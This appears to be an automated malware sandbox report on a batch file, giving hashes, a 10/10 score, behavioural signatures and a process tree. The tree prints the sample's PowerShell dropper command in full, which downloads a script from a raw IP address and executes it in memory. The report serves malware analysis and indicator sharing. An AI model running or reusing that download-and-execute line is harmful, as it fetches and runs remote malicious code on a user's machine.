Analysis
-
max time kernel
108s -
max time network
142s -
platform
windows10_x64 -
resource
win10v200217 -
submitted
04-03-2020 16:10
Static task
static1
Behavioral task
behavioral1
Sample
UJvbivju.bat
Resource
win7v200217
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
UJvbivju.bat
Resource
win10v200217
windows10_x64
0 signatures
0 seconds
General
-
Target
UJvbivju.bat
-
Size
189B
-
MD5
30e9f006bd27f61b87649fb861b70525
-
SHA1
602c170aa87ed68a7c5f68f15a162bdbd51dfc1f
-
SHA256
c27c8d9ea31e707420a5f77581ead62b943e9195989ff1d5df30d0ecafefe2e6
-
SHA512
f9c62d8bff196da519b3c336d079781f33cdd0123f910448d9b8be41b732b149dbbed44e1bdb58ebf67d914ae4ec0d376ac16688851ea6714a21cf638a6cd7ae
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/UJvbivju
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3156 3696 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 3156 WerFault.exe Token: SeBackupPrivilege 3156 WerFault.exe Token: SeDebugPrivilege 3156 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 3156 WerFault.exe 3156 WerFault.exe 3156 WerFault.exe 3156 WerFault.exe 3156 WerFault.exe 3156 WerFault.exe 3156 WerFault.exe 3156 WerFault.exe 3156 WerFault.exe 3156 WerFault.exe 3156 WerFault.exe 3156 WerFault.exe 3156 WerFault.exe 3156 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\UJvbivju.bat"1⤵PID:2416
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/UJvbivju');Invoke-QGTRJX;Start-Sleep -s 10000"2⤵PID:3696
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3696 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3156